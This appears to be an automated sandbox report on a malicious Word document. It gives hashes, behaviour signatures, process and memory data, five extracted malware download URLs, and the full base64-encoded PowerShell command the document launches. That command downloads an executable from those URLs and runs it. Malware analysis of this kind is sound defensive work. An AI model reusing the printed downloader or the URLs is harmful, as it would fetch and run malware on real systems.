Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01-05-2024 14:01

General

  • Target

    0bfa9702c05f303cf0ef69293b52ec6e_JaffaCakes118.doc

  • Size

    165KB

  • MD5

    0bfa9702c05f303cf0ef69293b52ec6e

  • SHA1

    3561ecd13f2ed821ff206cb0ff7262a0ce84abd4

  • SHA256

    a84f95c0558d7b9d3a2a1b254ce94e82033e880445bc33e19ad57c8d76b90ca7

  • SHA512

    e30b6342065dcc6af915c192507547f35fb52bbf3001c3d1381527fa542c95d84c3aba5096afd8ce6f6dcba72b638dd490a30f860ee8961619b639fe3dd6b42d

  • SSDEEP

    3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qyTl7IlSeAvMnyor/6GNDVDAGWM21rS:h77HUUUUUUUUUUUUUUUUUUUT52Vzl7U9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://programmephenix.com/wp-content/languages/kjdx0ls2/

exe.dropper

http://axletime.com/wp-admin/r0gmx40208/

exe.dropper

http://5elements-development.com/wp-content/uoesp16/

exe.dropper

http://bestphotographytnj.com/rrm9/lm83yx518/

exe.dropper

http://citilinesholdings.com/wp/cysk9wh832/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bfa9702c05f303cf0ef69293b52ec6e_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e JABFADQANgA1ADgANgAyADEAPQAnAFEANgA0ADUANQAyADcAJwA7ACQAdwA1ADQANwA0ADMAOAAzACAAPQAgACcAOQA3ADQAJwA7ACQAbwA2ADYAMAAxAF8APQAnAHoAXwAyADMAMAA0ADYAMwAnADsAJABDADUAMQAyADAANQA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3ADUANAA3ADQAMwA4ADMAKwAnAC4AZQB4AGUAJwA7ACQAUwA4ADkANAA5ADkANAA1AD0AJwBIADIAOAA5ADAANwBfADcAJwA7ACQAbAAyADUAXwBfADMAXwA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAQgBjAGAAbABJAGUAYABOAFQAOwAkAHcAMgAwAF8ANgBfADUAPQAnAGgAdAB0AHAAOgAvAC8AcAByAG8AZwByAGEAbQBtAGUAcABoAGUAbgBpAHgALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBsAGEAbgBnAHUAYQBnAGUAcwAvAGsAagBkAHgAMABsAHMAMgAvAEAAaAB0AHQAcAA6AC8ALwBhAHgAbABlAHQAaQBtAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHIAMABnAG0AeAA0ADAAMgAwADgALwBAAGgAdAB0AHAAOgAvAC8ANQBlAGwAZQBtAGUAbgB0AHMALQBkAGUAdgBlAGwAbwBwAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG8AZQBzAHAAMQA2AC8AQABoAHQAdABwADoALwAvAGIAZQBzAHQAcABoAG8AdABvAGcAcgBhAHAAaAB5AHQAbgBqAC4AYwBvAG0ALwByAHIAbQA5AC8AbABtADgAMwB5AHgANQAxADgALwBAAGgAdAB0AHAAOgAvAC8AYwBpAHQAaQBsAGkAbgBlAHMAaABvAGwAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALwBjAHkAcwBrADkAdwBoADgAMwAyAC8AJwAuAFMAcABsAEkAdAAoACcAQAAnACkAOwAkAFUAOAAwADUAMgA3ADYAMgA9ACcAdQAzADcANwA3ADcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE8AMwA5ADUANwAxACAAaQBuACAAJAB3ADIAMABfADYAXwA1ACkAewB0AHIAeQB7ACQAbAAyADUAXwBfADMAXwAuAGQATwBXAE4ATABPAEEAZABGAEkAbABlACgAJABPADMAOQA1ADcAMQAsACAAJABDADUAMQAyADAANQA0ACkAOwAkAG4AOQA2ADcAXwA4ADYAPQAnAFQANAA0ADUAXwA2ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQwA1ADEAMgAwADUANAApAC4ATABFAE4AZwB0AGgAIAAtAGcAZQAgADMANwA0ADIAMAApACAAewAmACgAJwBJACcAKwAnAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACAAJABDADUAMQAyADAANQA0ADsAJABzADQAMgAzADMAMwAwADEAPQAnAFoAMQAyADQAMwA1ADkAMQAnADsAYgByAGUAYQBrADsAJABtADIAMAAzADMAMgAwADQAPQAnAG0AOQAxAF8AOQAxADQANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwADAAOAA3ADUAMwA9ACcAQwBfADIANQA4ADkAXwA4ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      ef3a5f6eb0f88cec1af8f0ef4e9f5646

      SHA1

      fd9b0adf553583d540020c8eb20ae992365de543

      SHA256

      9c4c13daaa6260897760fadcd2b790a3befc85457a22fef06d25fcd839d2e9b9

      SHA512

      479c8e3beeed6f74b5f8772d3b61ebe233d28963fa4dabe612be470d069a216bd636d81ef799541074061269b919b1fb52cbd5f95a4a82d3762efb62c3632ec3

    • memory/2784-36-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-33-0x00000000717FD000-0x0000000071808000-memory.dmp

      Filesize

      44KB

    • memory/2784-9-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-14-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-17-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-18-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-2-0x00000000717FD000-0x0000000071808000-memory.dmp

      Filesize

      44KB

    • memory/2784-53-0x00000000717FD000-0x0000000071808000-memory.dmp

      Filesize

      44KB

    • memory/2784-52-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2784-34-0x0000000006730000-0x0000000006830000-memory.dmp

      Filesize

      1024KB

    • memory/2784-35-0x0000000006550000-0x0000000006650000-memory.dmp

      Filesize

      1024KB

    • memory/2784-0-0x000000002F371000-0x000000002F372000-memory.dmp

      Filesize

      4KB

    • memory/2784-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2864-24-0x000000001B8C0000-0x000000001BBA2000-memory.dmp

      Filesize

      2.9MB

    • memory/2864-25-0x0000000001F40000-0x0000000001F48000-memory.dmp

      Filesize

      32KB